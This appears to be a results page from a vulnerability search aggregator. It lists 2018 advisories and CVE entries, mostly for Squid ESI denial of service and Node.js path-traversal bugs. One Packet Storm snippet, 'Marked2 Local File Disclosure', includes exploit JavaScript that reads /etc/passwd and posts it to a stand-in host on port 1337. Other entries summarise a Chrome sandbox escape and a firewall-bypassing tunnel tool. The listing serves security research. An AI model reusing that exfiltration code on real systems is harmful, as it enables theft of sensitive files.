Lucene search
+L

2313 matches found

Imperva Blog
Imperva Blog
added 2018/04/05 3:30 p.m.64 views

A Deep Dive into Database Attacks [Part IV]: Delivery and Execution of Malicious Executables through SQL Commands (MySQL)

In a previous post we covered different techniques for execution of SQL and OS commands through Microsoft SQL server that can be used for delivering and executing malicious payloads on the target system. In this post we’ll discuss the same topic for MySQL database. Creating an executable directly...

7.8AI score
SaveExploits0
Tenable Nessus
Tenable Nessus
added 2018/03/24 12:0 a.m.42 views

ManageEngine EventLog Analyzer XSS Vulnerability

The version of ManageEngine EventLog Analyzer installed on the remote host is prior or equal to 11.0 Build 11000. It is, therefore, affected by a cross-site scripting XSS vulnerability. An attacker can exploit this flaw to inject arbitrary HTML or script code into a user's browser to be executed...

6.1CVSS6AI score0.01932EPSS
SaveExploits1References2
0day.today
0day.today
added 2018/03/09 12:0 a.m.35 views

Chrome 35.0.1916.153 - Sandbox Escape / Command Execution Exploit

Exploit for windows platform in category local exploits Sandbox escape Chrome exploit. Allows the execution of local binaries, read/write functions and exfiltration of Chrome OAuth tokens to remote server. More info: https://bugs.chromium.org/p/chromium/issues/detail?id=386988 Download:...

0.2AI score
SaveExploits0
GitLab Advisory Database
GitLab Advisory Database
added 2018/02/26 12:0 a.m.13 views

Path Traversal

626 includes a path traversal vulnerability. It allows reading arbitrary files from the remote server...

4.5AI score
SaveExploits0References1Affected Software1
Tenable Nessus
Tenable Nessus
added 2018/02/23 12:0 a.m.46 views

Debian DSA-4122-1 : squid3 - security update

Several vulnerabilities have been discovered in Squid3, a fully featured web proxy cache. The Common Vulnerabilities and Exposures project identifies the following issues : - CVE-2018-1000024 Louis Dion-Marcil discovered that Squid does not properly handle processing of certain ESI responses. A...

7.5CVSS6.5AI score0.12912EPSS
SaveExploits0References10
Kitploit
Kitploit
added 2018/02/18 9:12 p.m.32 views

Tunna - Set Of Tools Which Will Wrap And Tunnel Any TCP Communication Over HTTP

Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments. SUMMARY TLDR: Tunnels TCP connections over HTTP In a fully firewalled inbound and outbound connections restricted - except the...

8.2AI score
SaveExploits0References1
Prion
Prion
added 2018/02/09 11:29 p.m.39 views

Design/Logic Flaw

The Squid Software Foundation Squid HTTP Caching Proxy version 3.0 to 3.5.27, 4.0 to 4.0.22 contains a Incorrect Pointer Handling vulnerability in ESI Response Processing that can result in Denial of Service for all clients using the proxy.. This attack appear to be exploitable via Remote server...

5CVSS7.4AI score0.07928EPSS
SaveExploits0References6Affected Software3
Debian CVE
Debian CVE
added 2018/02/09 11:0 p.m.36 views

CVE-2018-1000024

The Squid Software Foundation Squid HTTP Caching Proxy version 3.0 to 3.5.27, 4.0 to 4.0.22 contains a Incorrect Pointer Handling vulnerability in ESI Response Processing that can result in Denial of Service for all clients using the proxy.. This attack appear to be exploitable via Remote server...

7.5CVSS7.8AI score0.07928EPSS
SaveExploits0
Cvelist
Cvelist
added 2018/02/09 11:0 p.m.29 views

CVE-2018-1000024

The Squid Software Foundation Squid HTTP Caching Proxy version 3.0 to 3.5.27, 4.0 to 4.0.22 contains a Incorrect Pointer Handling vulnerability in ESI Response Processing that can result in Denial of Service for all clients using the proxy.. This attack appear to be exploitable via Remote server...

7.5AI score0.07928EPSS
SaveExploits0References6
CVE
CVE
added 2018/02/09 11:0 p.m.348 views

CVE-2018-1000024

The CVE-2018-1000024 vulnerability affects Squid HTTP Caching Proxy (versions 3.0–3.5.27 and 4.0–4.0.22). It is caused by Incorrect Pointer Handling in ESI Response Processing, enabling a Denial of Service when a remote server delivers an HTTP response payload with valid but unusual ESI syntax. I...

7.5CVSS7.5AI score0.07928EPSS
SaveExploits0References6Affected Software1
AlpineLinux
AlpineLinux
added 2018/02/09 11:0 p.m.28 views

CVE-2018-1000024

The Squid Software Foundation Squid HTTP Caching Proxy version 3.0 to 3.5.27, 4.0 to 4.0.22 contains a Incorrect Pointer Handling vulnerability in ESI Response Processing that can result in Denial of Service for all clients using the proxy.. This attack appear to be exploitable via Remote server...

7.5CVSS7.7AI score0.07928EPSS
SaveExploits0
Packet Storm
Packet Storm
added 2018/02/08 12:0 a.m.22 views

Marked2 Local File Disclosure

var file = "file:///etc/passwd"; var extract = "http://dev.example.com:1337/"; function geturl var xmlHttp = new XMLHttpRequest; xmlHttp.open"GET", url, false; xmlHttp.sendnull; return xmlHttp.responseText; function stealdata var xhr = new XMLHttpRequest; xhr.open'POST', extract, true; xhr.onload...

7.1AI score
SaveExploits0
Hacker One
Hacker One
added 2018/02/06 3:43 p.m.82 views

Node.js third-party modules: [mcstatic] Path Traversal allows to read content of arbitrary files

Hi Guys, There is Path Traversal in mcstatic module. It allows to read content of arbitrary files on the remote server. Module mcstatic This is a general file server made by nodejs. It will be easy for you to access the files on the server through the browser. https://www.npmjs.com/package/mcstat...

5CVSS0.6AI score0.02038EPSS
SaveExploits1
OSV
OSV
added 2018/02/05 6:9 p.m.12 views

USN-3557-1 squid3 vulnerabilities

Mathias Fischer discovered that Squid incorrectly handled certain long strings in headers. A malicious remote server could possibly cause Squid to crash, resulting in a denial of service. This issue was only addressed in Ubuntu 16.04 LTS. CVE-2016-2569 William Lima discovered that Squid incorrect...

7.5CVSS6.8AI score0.35265EPSS
SaveExploits0References7
Hacker One
Hacker One
added 2018/01/31 11:18 p.m.56 views

Node.js third-party modules: [hekto] Path Traversal vulnerability allows to read content of arbitrary files

Hi Guys, There is Path Traversal vulnerability in hekto module, which allows to read arbitrary file from the remote server. Module hekto This package exposes a directory and its children to create, read, update, and delete operations over http. https://www.npmjs.com/package/hekto version: 0.2.0...

5CVSS7.4AI score0.02038EPSS
SaveExploits1
Hacker One
Hacker One
added 2018/01/31 11:6 p.m.72 views

Node.js third-party modules: [626] Path Traversal allows to read arbitrary file from remote server

Hi Guys, There is Path Traversal vulnerability in 626 module, which allows to read arbitrary file from the remote server. Module 626 This package exposes a directory and its children to create, read, update, and delete operations over http. https://www.npmjs.com/package/626 version: 1.1.1 Stats 0...

5CVSS7.3AI score0.02038EPSS
SaveExploits1
UbuntuCve
UbuntuCve
added 2018/01/29 12:0 a.m.36 views

CVE-2018-1000024

The Squid Software Foundation Squid HTTP Caching Proxy version 3.0 to 3.5.27, 4.0 to 4.0.22 contains a Incorrect Pointer Handling vulnerability in ESI Response Processing that can result in Denial of Service for all clients using the proxy.. This attack appear to be exploitable via Remote server...

7.5CVSS6.8AI score0.07928EPSS
SaveExploits0References4
Hacker One
Hacker One
added 2018/01/25 8:0 p.m.188 views

Node.js third-party modules: [node-srv] Path Traversal allows to read arbitrary files from remote server

Hi Guys, node-srv contains Path Traversal vulnerability, which allows malicious user to read content of any file with known path. Module: Simple static node.js server. Supports Heroku and Grunt.js https://www.npmjs.com/package/node-srv Description node-srv does not sanitize path in the correct wa...

4CVSS0.6AI score0.08632EPSS
SaveExploits1
Mageia
Mageia
added 2018/01/24 10:37 p.m.15 views

Updated squid packages fix security vulnerabilities

Due to incorrect pointer handling Squid is vulnerable to denial of service attack when processing ESI responses. This problem allows a remote server delivering certain ESI response syntax to trigger a denial of service for all clients accessing the Squid service SQUID-2018:1. Due to incorrect...

2AI score
SaveExploits0References3
Hacker One
Hacker One
added 2018/01/21 3:44 p.m.69 views

Node.js third-party modules: [serve] Directory index of arbitrary folder available due to lack of sanitization of %2e and %2f characters in url

Hi, This report is about Arbitrary Directory Listing vulnerability I found in serve module. Vulnerability does not allow to open arbitrary file due to send module which handles file reading and implements its own validation and protection against Path Traversal attacks. However serve handles...

4CVSS5.9AI score0.0179EPSS
SaveExploits1
Rows per page
Query Builder